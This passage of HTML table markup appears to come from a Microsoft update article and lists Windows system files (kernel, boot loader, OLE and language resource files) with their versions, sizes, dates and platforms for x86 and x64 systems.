applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,210,040</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntkrnlpa.exe</td><td>6.0.6002.24367</td><td>3,582,656</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>3,494,592</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>783,872</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>342,528</td><td>28-Apr-2018</td><td>01:15</td><td>x86</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>Not applicable</td></tr><tr><td>Videoprt.sys</td><td>6.0.6002.24367</td><td>105,472</td><td>28-Apr-2018</td><td>01:45</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>230,592</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>371,200</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>382,464</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,808</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>366,080</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>383,488</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>374,272</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,416</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,904</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,079,808</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>58,368</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,102,528</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,089,216</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winresume.efi</td><td>6.0.6002.24367</td><td>998,080</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>987,328</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,102,528</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24362</td><td>1,089,216</td><td>10-Apr-2018</td><td>19:45</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winresume.efi</td><td>6.0.6002.24367</td><td>998,080</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24259</td><td>986,856</td><td>15-Dec-2017</td><td>14:06</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>02:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>04:13</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>411,368</td><td>15-Dec-2017</td><td>14:06</td><td>x64</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,910,272</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>722,432</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>16,896</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,992</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>13,824</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>12,800</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:09</td><td>Not 